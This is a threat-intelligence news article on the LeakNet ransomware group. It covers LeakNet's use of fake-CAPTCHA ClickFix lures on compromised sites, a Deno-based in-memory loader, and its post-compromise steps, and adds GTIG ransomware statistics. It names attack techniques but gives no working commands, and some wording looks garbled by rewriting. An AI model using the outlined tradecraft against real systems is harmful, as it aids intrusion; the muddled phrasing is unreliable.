LeakNet Ransomware Uses ClickFix for Hacked Sites, Uses Deno In-Memory Loader
A ransomware activity known as LeakNet used the ClickFix social engineering tactic delivered by vulnerable websites as a primary means of access.
The use of ClickFix, where users are tricked into using malicious commands to deal with non-existent errors, is a departure from relying on traditional methods of gaining initial access, such as using stolen credentials obtained from initial access vendors (IABs), said ReliaQuest in a technical report published today.
The second key feature of this attack is the use of a command-and-control stage (C2) loader built into the Deno JavaScript runtime to execute the malicious payload directly in memory.
“The key takeaway here is that both entry methods lead to the same sequence of repeated exploits every time,” the cybersecurity company said. “That gives defenders something concrete to work with: known behavior that you can detect and disrupt at each stage, before the ransomware is sent, regardless of how LeakNet got into it.”
LeakNet first appeared in November 2024, describing itself as a “digital watchdog” and focusing its activities on internet freedom and transparency. According to the data collected by Dragos, this group also directed industrial associations.
The use of ClickFix to breach victims offers several advantages, the most important of which is that it reduces dependence on third-party providers, lowers the cost of finding each victim, and removes the operational bottleneck of waiting for important accounts to enter the market.
In this attack, legitimate-but-vulnerable sites are used to provide fake CAPTCHA tests that instruct users to copy and paste the “msiexec.exe” command into the Windows Run dialog. Attacks are not limited to a specific industry, instead they cast a wide net to infect as many victims as possible.
The development comes as many threat actors adopt the ClickFix playbook, as it abuses trust, daily workflows to lure users into executing malicious commands by using legitimate Windows tools in a way that sounds familiar and safe.
“LeakNet’s adoption of ClickFix marks both the first documented growth of the access group and a logical change,” said ReliaQuest.
“From the perspective of the IABs, LeakNet removes dependencies that inherently limited how quickly and widely it could work. And because ClickFix is delivered through legitimate—but vulnerable—websites that don’t present the same obvious signals at the network layer as attacker-run infrastructure.”
In addition to using ClickFix to launch a series of attacks, LeakNet is tested using a Deno-based loader to execute Base64-encoded JavaScript directly in memory to reduce on-disk evidence and avoid detection. The payload is designed to fingerprint the vulnerable system, communicate with an external server to download next-stage malware, and enter a polling cycle that repeatedly downloads and extracts additional code with Deno.
Separately, ReliaQuest said it also saw an intrusion attempt where malicious actors used a Microsoft Teams-based phishing attack to socially engineer a user to launch a payment chain that ends with the same Deno uploader. While the functionality remains undefined, the use of the bring-your-own-runtime (BYOR) method may indicate an expansion of LeakNet’s initial access vectors, or that other threat actors have used this method.
LeakNet’s post-compromise operation follows a consistent path: it starts with the use of a DLL sideloader to launch a malicious DLL delivered by the loader, followed by a combination of moves using PsExec, data filtering, and encryption.
“LeakNet uses cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on a vulnerable system. This tells an attacker which accounts and services are already accessible without the need to request new credentials, so they can move quickly and deliberately,” ReliaQuest said.
“In staging and deployment, LeakNet uses S3 buckets, exploiting the appearance of common cloud traffic to reduce its availability.”
The development comes as Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands with the most wanted victims on their data leak sites.
“In the third-party incidents, the first access vector was confirmed or suspected of exploiting vulnerabilities, usually in common VPNs and firewalls,” said the Google Threat Intelligence Group (GTIG), adding that 77% of analyzed ransomware installations included suspected data theft, which is an increase from 57% in 2024.
“Despite the ongoing disturbances caused by conflicts and disruptions of players, ransomware actors remain motivated and the robbery ecosystem shows continued resilience. Several indicators suggest that the overall profitability of these activities is decreasing, and at least some threat actors are moving their target statistics away from large companies to focus on small-volume attacks instead of small organizations.”
